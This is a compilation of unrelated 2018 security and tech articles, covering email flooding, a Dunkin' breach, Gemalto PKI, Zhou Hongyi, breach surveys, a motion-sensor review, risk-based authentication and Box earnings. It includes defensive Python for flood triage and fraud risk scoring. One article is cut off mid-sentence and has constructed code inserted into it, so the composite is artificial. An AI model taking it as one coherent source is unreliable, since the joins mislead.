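# Assumed phrase list for sign-up confirmations; tune per environment.
SUBSCRIPTION_RE = re.compile(
    r"(confirm|verify) your (subscription|e-?mail|account)"
    r"|welcome to|thanks for (signing up|subscribing)",
    re.IGNORECASE,
)


def make_flood_sample():
    """Constructed traffic: 40 sign-up confirmations in two minutes, with two
    legitimate messages and one unknown-sender message mixed in."""
    base = datetime(2018, 11, 20, 9, 0, 0)
    msgs = [(base + timedelta(seconds=3 * i),
             "noreply@list%02d.example.net" % i,
             "Please confirm your subscription") for i in range(40)]
    msgs.append((base + timedelta(seconds=45), "alerts@bank.example",
                 "Wire transfer initiated from account ending 1234"))
    msgs.append((base + timedelta(seconds=70), "cfo@example.com", "Re: Q4 budget"))
    msgs.append((base + timedelta(seconds=90), "stranger@example.org", "Quick question"))
    return msgs


def baseline_threshold(samples, k=3.0):
    """Hourly count above which the mailbox counts as flooded: mean plus k
    standard deviations of its normal hourly volume."""
    return statistics.mean(samples) + k * statistics.stdev(samples)


def triage(messages, known_senders, threshold, window=timedelta(hours=1)):
    """Return {"flood": bool, "deliver": [(sender, subject)],
               "hold": [(sender, subject, reason)]}.

    Without a flood everything is delivered. During a flood only known
    senders pass; the rest is held with the reason it was stopped.
    """
    if not messages:
        return {"flood": False, "deliver": [], "hold": []}
    newest = max(ts for ts, _, _ in messages)
    recent = [m for m in messages if newest - m[0] <= window]
    flood = len(recent) > threshold

    deliver, hold = [], []
    for _ts, sender, subject in sorted(messages):
        if not flood or sender in known_senders:
            deliver.append((sender, subject))
        elif SUBSCRIPTION_RE.search(subject):
            hold.append((sender, subject, "subscription-confirmation"))
        else:
            hold.append((sender, subject, "unknown-sender"))
    return {"flood": flood, "deliver": deliver, "hold": hold}


if __name__ == "__main__":
    verdict = triage(make_flood_sample(), KNOWN_SENDERS,
                     baseline_threshold(BASELINE_PER_HOUR))
    print("flood detected:", verdict["flood"])
    print("delivered:", len(verdict["deliver"]), "held:", len(verdict["hold"]))
    for item in verdict["deliver"]:
        print("  deliver", item)
```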

Hacktivists and fraudsters may have very different motivations for launching email flooding attacks, but the outcomes for those on the receiving end are all damaging to finances, reputation, operations, or a combination thereof. As this old technique makes its way back into the mainstream, those in charge of email security must adopt layered defenses that can detect and respond to an onslaught of messages with the efficiency that legacy tools and script writing cannot.


Eyal Benishti has spent more than a decade in the information security industry, with a focus on software R&D for startups and enterprises. Before establishing IRONSCALES, he served as security researcher and malware analyst at Radware, where he filed two patents in the ...

Dunkin' Donuts struck in latest credential stuffing attack


Dunkin' Donuts said a security vendor detected a so-called credential stuffing attack last month. (Flickr/ Thomas Hawk )


Written byJeff Stone

Nov 29, 2018 | CYBERSCOOP

Dunkin’ Donuts has alerted customers to a data breach that may impact those who signed up to DD Perks, the company’s loyalty program.

The fast-casual restaurant chain learned Oct. 31 that thieves obtained username and password information belonging to Dunkin’ customers via a credential stuffing incident. Those attacks occur when cybercriminals take credentials leaked in other data breaches and plug them into other sites, targeting users who re-use the same password across multiple sites.

“Our security vendor was successful in stopping most of these attempts, but it is possible that these third-parties may have succeeded in logging in to your DD Perks account if you used your DD Perks username and password for accounts unrelated to Dunkin’,” the company said in a statement.

Compromised information included customers’ first and last names, email addresses, their 16-digit DD Perks account number and the DD Perks QR code. Dunkin’ did not disclose the number of customers who may be affected.

Hackers often trade points for corporate loyalty programs on the dark web, selling airline miles, gift cards and other perks for cryptocurrency. Credential stuffing increasingly is becoming thieves’ preferred method for acquiring that stolen data: Some companies contend with an average of 3.75 billion malicious login attempts every month, according to recent findings from the security vendor Akamai.


Gemalto launches ‘industry’s first’ cloud access management, single sign on s ...


Digital security provider Gemalto is claiming an industry-first with the launch of a new solution that it says will enable organisations which have invested in Public Key Infrastructure (PKI) security applications to leverage their investment without compromise on security or user experience when moving to the cloud.

Gemalto says its new solution will enable employees and organisations to benefit from SSO and high assurance PKI-based authentication, making it easier and more secure to access cloud and web-based apps and resources from wherever and on any device.

Additionally, Gemalto says the solution will help users access PKI applications from new environments, including mobile devices and virtualised desktop environments, and use PKI credentials for security applications including digital signing and email encryption.

Through SafeNet Trusted Access, Gemalto says security-sensitive organisations whose employees log into enterprise resources with smart cards can use those same credentials to access cloud and web-based apps and benefit from single sign on (SSO).

According to Gemalto, up until now, PKI hardware’s limitations meant companies could not adopt cloud and mobility projects without having to completely ‘rip and replace’ their current security framework.

“As a result, companies have been using smart cards and tokens to allow their employees to authenticate themselves while accessing corporate resources, but this was limited to activity within the enterprise perimeter. In addition, companies that use PKI credentials for email encryption and digital signing have also been limited to on-premises environments,” Gemalto says.

“As much as cloud computing is recognised for its many benefits, the reality for most firms is that they will be operating in a hybrid environment for years to come,” said Garrett Bekker, Principal Security Analyst at 451 Research.

“By enabling firms to extend their existing PKI investments to cloud and web-based resources, SafeNet Trusted Access can help firms build on their existing security frameworks to accelerate their digital and cloud transformation.”

Gemalto is offering different ways to build on current PKI investments, so companies embrace digital transformation without compromising on security, including:

Enabling cloud transformation: Organisations can extend PKI credentials to access policies, allowing CISOs to maintain security in the cloud by triggering the use of step up PKI-based authentication to cloud and web-based apps when needed.

Facilitating mobility: Employees can access enterprise applications within virtual environments with their PKI credentials. This means that employees and consultants will be able to perform all the same actions they would normally perform with a smart card, with a virtual smart card.

“With the rapid development and adoption of cloud services, many organisations are struggling to balance their digital transformation projects with the need to keep themselves secure,” said Francois Lasnier, senior vice president of Identity and Access Management at Gemalto.



Zhou Hongyi: Contributing to National Cybersecurity


On April 20, 1994, China gained full-function access to the international Internet over a 64K international leased line, sixteen years after the start of reform and opening-up. In those sixteen years the private economy had developed considerably, the old system was gradually loosening, and a new consensus was beginning to form.

In 1992, Deng Xiaoping delivered his Southern Tour speeches; the importance of economic development was emphasized and ideological disputes were set aside.

The first generation of Internet entrepreneurs threw themselves into founding companies amid this tide. Zhou Hongyi formally joined somewhat later, but starting businesses was already routine for him. While still a student at Xi'an Jiaotong University, Zhou had several entrepreneurial ventures; after they failed, he joined Founder Group as a programmer in 1995. In 1998, Zhou left Founder and established 3721, which aimed to provide a Chinese-language keyword (网络实名) Internet access service.

The basic consensus established in the first twenty years of reform and opening-up provided Internet entrepreneurs with a favorable institutional and social climate. Against the backdrop of opening-up, overseas VCs prospecting for gold in China brought financial support to this group of entrepreneurs.

When Zhou Hongyi, with his longing for Silicon Valley, started 3721 as a "garage startup", a "crude" business plan written on two sheets of paper won him an investment of RMB 2 million from IDG Capital. IDG Capital was one of the earliest VCs to enter China after reform and opening-up.

Zhou has the typical traits of this cohort of entrepreneurs: highly educated, a computer science background, a former programmer, an excellent product manager. These founders often played the roles of both product manager and business manager.

Zhou himself was one of 3721's main developers; to this day, when product managers at 360 talk about him, they say "Old Zhou is first a product manager and only then an entrepreneur." Through Zhou and his peers the importance of the entrepreneur was further reinforced, and entrepreneurs became one of the most important constituents of the reform community.

Riding the tailwind of reform and opening-up, the first generation of Internet entrepreneurs successfully set out on the entrepreneurial road, in one of the industries where science and technology could best show their power. Their undertakings also became part of the reform community.

Before Chinese-language access services existed, users had to remember complicated English domain names, which invisibly raised the barrier to use. The Internet's arrival in China, as one of the fruits of reform and opening-up, ought to benefit more people. 3721's Chinese-language access service let more people enjoy the dividends of reform and opening-up and thereby join the reform community.

Expanding and consolidating the reform community requires innovation, and that is precisely the role Zhou played in the community. In 2006, Zhou became chairman of Qihoo 360; two years later, 360 released free antivirus software.

In an era when antivirus software was generally paid for, 360 forged a new business model: after meeting users' security needs with a free antivirus service, it used its browser to build an Internet access platform and earned revenue from value-added services.

In 2009, 360 became profitable. Kingsoft Antivirus (Jinshan Duba) and Rising followed suit, and China's antivirus market entered the free era.

When the Internet industry was just starting in China, many companies quickly copied product models that had already matured abroad, with some success; but from the standpoint of reform's long-term goals and the reform community's international image, innovation is the key to solving problems.

In 2018, Zhou led 360, which had been privatized and delisted from NASDAQ, back to the A-share market. In an interview he said that 360 would in future be an important force in national cybersecurity, and that it was more appropriate to do this as an A-share listed company. After returning to the A-share market, 360's market capitalization at one point reached a high of RMB 400 billion.

This year, entrepreneurs including Jack Ma and Robin Li have all said that, given the chance, they hope to return to the A-share market. Chinese companies going out and then coming back also means the reform community is working to make the system more inclusive and adaptable, embracing innovative enterprises and new-economy companies. 360's return is one example of the reform community's gradual improvement.

Security breaches come with a high price tag for UK businesses


UK consumers increasingly put their money where their trust is, research from PCI Pal finds

With the busy Christmas shopping period now upon us, new research conducted on behalf of payment security specialists PCI Pal has found that 44% of UK consumers will stop spending with a business or brand for several months in the immediate aftermath of a security breach or a hack.

Even more significantly, a further 41% of consumers will never return to a brand or a business post-breach, representing a significant loss of revenue, offering a stark warning to consumer-facing businesses.

The findings from the research commissioned by the payment security specialist suggest that the combination of high-profile recent breaches, headlines devoted to new data privacy regulations such as the GDPR, and personal experience have put security concerns at the forefront for UK consumers. Over a third (38%) confirmed they have personally suffered the negative consequences of a data security breach.

Meanwhile, consumers reported that even being perceived as having insecure data practices can be enough to incur spending penalties: 31% reported that they spend less with brands they perceive to have insecure data practices, while over a quarter (26%) say they stop spending completely if they don’t trust a company with their data.

“While security breaches are not new, consumers’ attitudes towards them appear to be changing significantly, with the vast majority of those surveyed now reporting that trust in security practices, or lack thereof, influences not just where but also how, and how much they are prepared to spend,” explained James Barham, CEO at PCI Pal.

The findings suggest that it’s not just online threats that worry consumers with 76% uncomfortable with providing payment information, such as credit card details, over the phone. Specifically, almost a third (32%) said they would hang up and find an alternative payment option, while nearly a quarter (24%) would ask for an online payment option and a further fifth (20%) would enquire as to how the data is being captured and whether it is safe.

Interestingly, when looking at the research findings by age group, 41% of those aged 18-24 said they would give their payment security information over the phone with no questions asked, compared to just 14% of those aged 55-65.

Barham continues: “What’s really interesting is how consumers are increasingly questioning data security practices. Nearly half of those surveyed know they should check a company’s security processes and 22% said they question businesses directly or research how an organisation safeguards consumer data. This suggests a real change in how consumers prioritise privacy and security. This should act as a real wake-up call to consumer-facing brands: they need to adopt stronger security practices, especially for those operating contact centres where payments are handled over the phone if they want to keep customers loyal and spending with them.”

Finally, from an industry perspective, consumers were asked which verticals they consider to be the least secure or most likely to suffer a security breach: 41% of consumers said the financial sector, followed by 40% suggesting retail and 35% suggesting the travel industry.

To download a copy of the ‘This Is The UK’ eBook, which includes additional findings from the survey, visit: https://www.pcipal.com/knowledge-centre/guides/uk-state-of-security-eyes-of-consumers/ .


The post Security breaches come with a high price tag for UK businesses appeared first on PCI Pal .

Kangaroo Motion Sensor review: This home security system only goes halfway


Motion sensors are an essential component of any home security system. But in Kangaroo’s current ecosystem, motion sensors are the only component.

On the upside, that means you don’t need a central hub, because the sensors connect directly to your Wi-Fi network. What’s more, a single motion sensor can cover an entire room, saving you from the expense of installing door/window sensors on every door and window leading into the room. On the downside, you won’t be notified of intruders in your home until they’re already in your home. And you get no protection at all when you’re at home.

You’ll need to install an app on your smartphone (Android and iOS are supported) to receive messages from the sensors, and you can invite third parties―such as a neighbor―to help you monitor your home by typing their mobile phone numbers into the app. Kangaroo will send them an invitation, and they will also need to install the app (you should of course ask them if they’re willing to do this for you ahead of time).

(Image: Michael Brown) You’ll arm and disarm the sensors from the app’s home screen. You’ll also see notifications here.

Under the free self-monitoring plan, Kangaroo will send push notifications to the app on your phone and to whoever has accepted your invitation to help. A paid subscription―$9 per month or $60 per year―unlocks a host of additional features, including professional monitoring service (more on that in a bit).

Professionally monitored security systems generally qualify you for a discount on your homeowners’ insurance, and Kangaroo says it will help you obtain that from your insurance provider. The last benefit included with the subscription plan is Amazon Alexa integration (Google Assistant and IFTTT integration are in the works).

Installation and usage

Kangaroo’s motion sensors are relatively compact devices (3.55 x 1.55 x 0.7 inches) that operate on two AA batteries (included). They come with double-sided adhesive pads on the back for peel-and-stick installation. I’ve never encountered an adhesive that lasted for very long, and the motion sensor I installed in my garage fell off after just a month of summer heat (Kangaroo rates them for indoor use only, but I don’t consider the garage to be outdoors).

That said, the unit I installed inside the house remained mounted until I took it down at the end of my review. Kangaroo helpfully provides two wood screws for a more secure installation, but there’s only one predrilled hole on the detachable back that faces the wall. I would recommend drilling one above that to prevent the top-heavy sensor from pivoting down.

Actually, Kangaroo suggests mounting its motion detectors vertically, with the sensor at the bottom. But if you have pets, it recommends mounting them with the sensor at the top to avoid false alarms (the company says the motion detector will ignore moving objects up to 2 feet 4 inches high). The sensor itself detects motion up to 15 feet away, with a 120-degree field of view.

During installation, you name each sensor according to the room it’s installed in, and you provide your street address and phone number via the app. A supplemental field in the home address section labeled “Notes for authorities” allows you to provide information they might find helpful when they respond to a call. I entered the code for my electric gate in this field. Kangaroo suggests other scenarios, too, such as if there is an elderly or disabled person in the home, or if there’s a key under the welcome mat.

(Image: Michael Brown) If you miss the text message the subscription service sends when a sensor detects motion, you’ll get a phone call from a live human.

The system is ready to use as soon as you have your sensors installed and registered in the app. To arm the system, swipe right on the app’s home screen. This will initiate a 10-minute countdown to allow you to leave your home without setting off the motion detectors. There is currently no way to eliminate this countdown should you choose to activate the sensors after you’ve already closed the door behind you.

Since Kangaroo doesn’t have any other type of sensors, there’s no “home” and “away” mode. “Away” mode is all you get. You wouldn’t want the motion sensors active while you’re at home, unless they’re installed in rooms you don’t routinely go into (the garage, maybe?). I suppose you could discipline yourself to remember to disarm the sensors when you do go in those rooms, but that’s just not very realistic. As it exists today, this security system can only protect your home while you’re gone.

When a sensor is tripped, you’re notified via push notification to the app on the free plan, where a “call 911” button is displayed. With the subscription plan, you’ll get a push notification and/or a text message. Subscribers also get a robocall. In all cases, you can slide a button to disarm the system if you decide it’s a false alarm. If you’re a subscriber and don’t take any action, a representative will call you to ask if everything is OK. If you don’t respond to that call, the monitoring service will notify the police.

System integration, or the lack thereof

As I mentioned earlier, Alexa integration (and Google Assistant, at some point) is included with a paid subscription, and IFTTT integration is in the works. But that’s as far as Kangaroo goes. You can’t integrate with SmartThings or any other product or service, and that includes sirens, door/window sensors, and security cameras. Kangaroo is working on new products for the first two categories, but not the third.

Sirens can be helpful because they draw attention to your home―something no intruder wants. Personally, I like to have the loudest siren I can get, in the hope the noise will drive the intruder out. The absence of door/window sensors means you might unknowingly leave one or more of them open when you leave, giving an intruder an easy access point.

But the absence of security camera support is this system’s biggest shortcoming: Considering that the police departments in many jurisdictions issue fines for false alarms, how confident will you feel calling 911 based solely on a motion sensor being triggered?

(Image: Michael Brown) Kangaroo Motion Sensors have a 120-degree field of view and 15-foot range.

You could install third-party security cameras in the rooms where the motion detectors are installed, but you’d need to launch a separate app to access those feeds, hoping to see whatever set off the alarm. But there’s no guarantee the camera’s motion sensor will be tripped by the same event that set off the motion detector. A more robust and better integrated security system will trigger all your security cameras to record, giving you the best chance of seeing what’s going on and what happened.

Cheap, but not inexpensive

Cash-strapped homeowners might consider a $30 self-monitored motion sensor to be a good deal, and the subscription fee for professional monitoring is the cheapest I’ve seen. But this system’s biggest limitation is that it offers virtually no security while you’re in your home, and the professional monitoring plans for some complete DIY home security systems don’t cost much more than Kangaroo is charging. A $199 Ring Alarm kit, for example, includes one motion sensor, one door/window sensor, a siren, and more, and it can be integrated with Ring’s video doorbells and indoor/outdoor security cameras. Ring’s optional professional monitoring option costs $10 per month, and that includes cellular radio backup if you lose your broadband connection, plus cloud storage for an unlimited number of Ring cameras.

Kangaroo has several other weaknesses as well. The app doesn’t maintain an event log, so any history of motion detection is erased as soon as you clear your smartphone notifications. And there’s no geofencing feature, so you’ll need to remember to arm the system each time you leave and disarm it every time you return. Bottom line: Kangaroo is a cheap home security system, but it doesn’t offer a whole lot of value.

This story, "Kangaroo Motion Sensor review: This home security system only goes halfway" was originally published by TechHive .

How Risk-based Authentication Cuts Fraud Losses and Improves Customer Satisfacti ...


The fourth quarter is a time when many financial institutions are deep into strategic planning for the coming year. Whether you are on the business or security side of the house, it is the time to re-evaluate how to protect and simplify the customer experience with the right security technologies, increase customer loyalty, and reduce exposure to fraud and data breaches.

The risk of cyberattack on financial institutions cannot be overstated. In the past year, there have been more than one billion cyberattacks on financial institutions [1]. That is 300 times more than other industries such as retail, insurance, or healthcare. At an average cost of $18 million [2] for each successful attack, the cost of cybercrime includes:

Regulatory fines
Litigation
Additional cybersecurity technologies to be purchased and implemented following the breach
Response to negative media coverage
Identity theft protection and credit monitoring services to customers affected by the breach
Lost business due to reputational damage

In fact, financial institutions lost over $16.8 billion to cybercriminals in 2017 [3] alone. Account takeover fraud tripled in 2017, which resulted in $5.1 billion in associated losses [4]. According to Ponemon Institute’s consumer sentiment study [5], data breaches are in the top three incidents that affect brand reputation, along with poor customer service and environmental incidents.

Cybercriminals will continue to get more sophisticated in attacking their prime target: financial institutions. In this blog, we discuss risk-based authentication as an important element of your security strategy and how it enables you to improve customer satisfaction, cut fraud losses, and better meet strict regulations.

Risk-based Authentication (RBA)

Risk-based authentication is a fast and cost-efficient way to improve security. With so many financial transactions moving to digital channels, the potential for increased fraud and attacks is inevitable. And while new regulations guide FIs to better fight fraud by requiring new security technologies, they can also introduce more friction to customer transactions. This is one of the greatest challenges for FIs today. How to drive down fraud and meet compliance requirements, in a way that is easy and convenient for the customer?

The answer is risk-based authentication, also known as adaptive authentication or step-up authentication. Risk-based authentication is the process of applying the precise amount of security, at the right time, to each unique customer transaction based on its level of risk: no more, no less. It is the risk score that drives the level of security required (e.g., push notification, fingerprint, facial recognition, etc.).

Risk-based authentication provides a wide range of benefits across your organization, including the winning conditions for growth, reduced fraud, and an optimal customer experience.


Risk-based Authentication Benefit #1: The Winning Conditions for Growth

As fraud increases, so does the need for stronger authentication and security. At the same time, however, the customer’s patience for additional security measures is dwindling. Add too many authentication layers, and users will get frustrated spending too much time trying to access their accounts.

Transacting with financial institutions has to be as easy as it is secure. It should be so easy and frictionless that customers don’t even think about the security. Studies show that consumers generally don’t think about security until it breaks. When that happens, people tend to blame the financial institution. Clearly, security has to be done well in order to create the best possible customer experiences, since this will drive growth through improved customer loyalty, retention, and use of bank services.

Risk-based authentication is key to unlocking growth for banks by improving the customer experience across all channels. This can be done with frictionless authentication, such as biometrics, facilitated by better fraud detection that leverages the combination of advanced machine learning and customized rule sets. As banks add new online services and new ways to serve a more mobile population, risk-based authentication can help keep pace with security and provide the least intrusive experience possible for customers.

Risk-based Authentication Benefit #2: More Robust Defense against Fraud

There is a clear need to continuously improve your overall security defenses as bad actors grow more adept at fraud and compromising systems. Static passwords are easily hacked and, as a result, they are a key cause of security breaches and account fraud. Part of the problem with passwords is that modern fraud methods are so sophisticated, a simple password has no hope of preventing them. These attacks can make use of a variety of malware tools to penetrate a network, establish themselves across various servers, and use different methods, such as Brutus, RainbowCrack, Wfuzz and others to compromise credentials, disable various protective measures, and hide from detection.

The best way to combat this is to couple risk-based authentication with a risk analytics engine to provide a more flexible layered, risk-based approach to authentication. Good risk-based authentication platforms can examine a wide variety of inputs across all channels and make real-time decisions about the precise level of authentication security required for each unique transaction.

Risk-based authentication assembles a series of risk scores to evaluate each transaction. As the predictive models “learn” more, the risk score becomes more accurate as it accepts various inputs. Over time, it will become a more reliable indicator of account compromise and emerging fraud patterns. Because the level of risk is based on the total contextual view including user behavior, transaction data, and device data, it is very difficult to impersonate.
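The scoring the two paragraphs above describe, contextual signals from device data, transaction data and user behaviour combined into one risk score that selects the step-up level, can be shown in a small engine. This is an added example, not the vendor's product or any bank's engine; the weights, score bands, impossible-travel thresholds and the sample user profile are constructed for illustration.

```python
from dataclasses import dataclass
from math import asin, cos, radians, sin, sqrt
from statistics import mean, pstdev
from typing import Optional, Tuple


@dataclass
class UserProfile:
    user_id: str
    known_devices: set                               # device fingerprints seen before
    usual_hours: set                                 # local hours the user normally transacts
    amount_history: list                             # past transaction amounts
    last_seen: Optional[Tuple[float, float, float]]  # (epoch seconds, lat, lon)


@dataclass
class Transaction:
    device_id: str
    amount: float
    ts: float          # epoch seconds
    hour: int          # local hour of day
    lat: float
    lon: float
    payee_known: bool  # payee already in the user's beneficiary list


# Score bands and the step-up each triggers, lowest friction first (assumed).
LEVELS = [(0, "seamless"), (20, "push_notification"),
          (50, "biometric"), (80, "block_and_review")]


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance in km between two points."""
    dlat, dlon = radians(lat2 - lat1), radians(lon2 - lon1)
    a = sin(dlat / 2) ** 2 + cos(radians(lat1)) * cos(radians(lat2)) * sin(dlon / 2) ** 2
    return 2 * 6371.0 * asin(sqrt(a))


def device_risk(profile, tx):
    return 0 if tx.device_id in profile.known_devices else 30


def velocity_risk(profile, tx):
    """Impossible-travel check against the last seen location."""
    if profile.last_seen is None:
        return 0
    t0, lat0, lon0 = profile.last_seen
    dist = haversine_km(lat0, lon0, tx.lat, tx.lon)
    if dist < 50:                                    # same city: ignore GPS jitter
        return 0
    hours = (tx.ts - t0) / 3600.0
    speed = dist / hours if hours > 0 else float("inf")
    if speed > 900:
        return 35
    if speed > 300:
        return 15
    return 0


def amount_risk(profile, tx):
    """z-score of the amount against the user's own history."""
    hist = profile.amount_history
    if len(hist) < 5:                                # too little history to profile
        return 10 if tx.amount > 1000 else 0
    sd = pstdev(hist) or 1.0
    z = (tx.amount - mean(hist)) / sd
    if z > 3:
        return 25
    if z > 2:
        return 15
    return 0


def behaviour_risk(profile, tx):
    risk = 0
    if tx.hour not in profile.usual_hours:
        risk += 10
    if not tx.payee_known:
        risk += 10
    return risk


def assess(profile, tx):
    """Combine the partial scores and pick the step-up level."""
    parts = {"device": device_risk(profile, tx), "velocity": velocity_risk(profile, tx),
             "amount": amount_risk(profile, tx), "behaviour": behaviour_risk(profile, tx)}
    score = min(100, sum(parts.values()))
    level = next(name for floor, name in reversed(LEVELS) if score >= floor)
    return {"score": score, "level": level,
            "signals": {k: v for k, v in parts.items() if v}}


def demo():
    """Constructed profile (a London user) and three transactions."""
    london, new_york = (51.5074, -0.1278), (40.7128, -74.0060)
    profile = UserProfile("u123", {"dev-A"}, set(range(8, 21)),
                          [40, 55, 60, 48, 52, 70, 45], (0.0, *london))
    routine = Transaction("dev-A", 50, 3600, 12, *london, payee_known=True)
    large = Transaction("dev-A", 500, 7200, 12, *london, payee_known=True)
    takeover = Transaction("dev-B", 5000, 7200, 3, *new_york, payee_known=False)
    return {name: assess(profile, tx)["level"]
            for name, tx in (("routine", routine), ("large", large), ("takeover", takeover))}


if __name__ == "__main__":
    for name, level in demo().items():
        print(f"{name:9s} -> {level}")
```

The routine payment passes with no extra friction, the unusually large one from the known device gets a push notification, and the new-device, new-payee, impossible-travel transaction is blocked for review.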

Risk-based Authentication Benefit #3: Achieve Regulatory Compliance

Banking regulations are constantly changing to help banks stay ahead of hackers. The security compliance requirements can be quite extensive and have sizeable penalties for non-compliance. To comply, your organization must be agile and ever vigilant, continuously refining your compliance strategies and implementing new technologies.

One specific regulatory requirement facing financial institutions today is PSD2 compliance the regulation focused on payment services and payment service providers throughout Europe. PSD2 mandates monitoring of transactional risks, detection of known and emerging fraud methods, and strong customer authentication. It provides a framework that enforces different risk-based

Break-even in sight for Box as enterprise deals increase in size and number

Box CEO Aaron Levie posted a tongue-in-cheek comment on Twitter yesterday following the release of the cloud storage and collaboration vendor’s latest quarterly numbers: Turns out this start-up thing really is a marathon.

He was alluding to the company’s failure to return a profit, some 13 years since founding, although there’s sight now of break-even coming next year.

That said, the numbers released for Q3 were heading in the right direction, with a 21% year-on-year rise in revenues to $155.9 million and net losses down from $42.9 million to $40.2 million. And there were some strong stats trotted out that deal sizes are on the up as well. For Q3:

90,000 paying customers, up from 87,000 in Q2.
57 deals over $100,000 versus 40 a year ago.
11 deals over $500,000 versus 5 a year ago.
3 deals over $1 million versus 1 a year ago.

It’s also significant that more than 80% of the 6-figure deals are multi-product deals with at least one add-on spend, said Levie:

Enterprises are understanding that a comprehensive cloud content management offering is critical to their business. In this quarter, customers are increasingly choosing Box over point solutions and fragmented offerings of our competitors.

Particular interest is coming from the governance and platform offerings:

As customers have either done enterprise license agreements with us or we’ve been able to bundle multiple solutions together, governance has they come up a core part of that add-on strategy. We are also seeing platform in some key markets, like financial services, and will come from governance in areas like public sector, life sciences and financial services. I think we’re seeing a nice mix of as customers really use us as a backend system for content management across their line of business applications across their customer facing applications, across their core ERP systems, things like information governance, platform capabilities or APIs and then in the future our automation and workflow functionality that we needed in Box, will become very, very core to delivering on that.

Customers?

OK, so who are the customers that are doing all this? On this point, Levie was disappointingly vague, citing ‘cloaked’ use cases rather than specific logos. So:

One of the world’s largest asset management and financial advisory firms selected Box in Q3 over SharePoint Online to enable secure external collaboration with its partners and third parties to replace legacy network file shares and develop custom client portals to better serve their most important customers. The firm will be leveraging the full suite of the Box offering, including Box Governance, KeySafe, Multi-Zones and Box Platform across their entire organization with their partners and customers. We also executed on our enterprise license agreements or ELA program, and while still early, we saw more customers choosing to go wall-to-wall with Box in this quarter. For example, a top 10 U.S financial services firm, who is already wall-to-wall with the Box Core ELA, expanded their contract to also include a Box Platform ELA as well. This firm will broaden its use of Box Platform as the content layer for its custom application development across the business. We also closed an ELA with the world’s largest medical device company, who is leveraging Box Governance and Zones to bolster content security and protect their most sensitive data. As part of the agreement, the customer also purchased Box’s custom consulting offering Box Transform to accelerate its digital transformation initiatives.

Looking ahead to 2019, Levie identified a couple of recent developments that he reckons will tick the right boxes for users, starting with Box Skills Kit. Due for general release before Christmas, this is pitched as enabling enterprise customers, third-party developers and system integrators to build custom AI integrations for Box:

Box Skills Kit will unlock powerful use cases, like computer-powered audio, video and image recognition, by leveraging advanced AI and machine learning capabilities from a wide range of technology leaders like IBM, Google and Microsoft, who are excited to see what our customers and developers create with Box Skills Kit starting next month.

And security capabilities will continue to be a priority in 2019, said Levie:

Security continues to be a critical differentiator for Box and a primary reason why customers choose our cloud content management platform. At BoxWorks, we previewed Box Shield, a set of advanced security capabilities built on our proprietary advanced machine learning technology that will help customers protect their content and users from internal and external threats. Security teams will be able to apply policies that restrict sharing and external collaboration on sensitive files, for example. And they will also be able to set rules to detect suspicious user behavior and proactively alert customers when behavior deviates from what is normal. While Shield will not be generally available until next year, we are already seeing incredibly strong interest and demand from customers.

My take

As a long-term Box-watcher, the journey to profitability has been frustratingly slow, but perhaps the tipping point is finally in sight. This latest set of numbers is solid rather than spectacular. Box has some terrific use cases out there, and it would be good to hear more about, and from, them than the vague references that were on show. Maybe in 2019?

Image credit - Twitter/Box
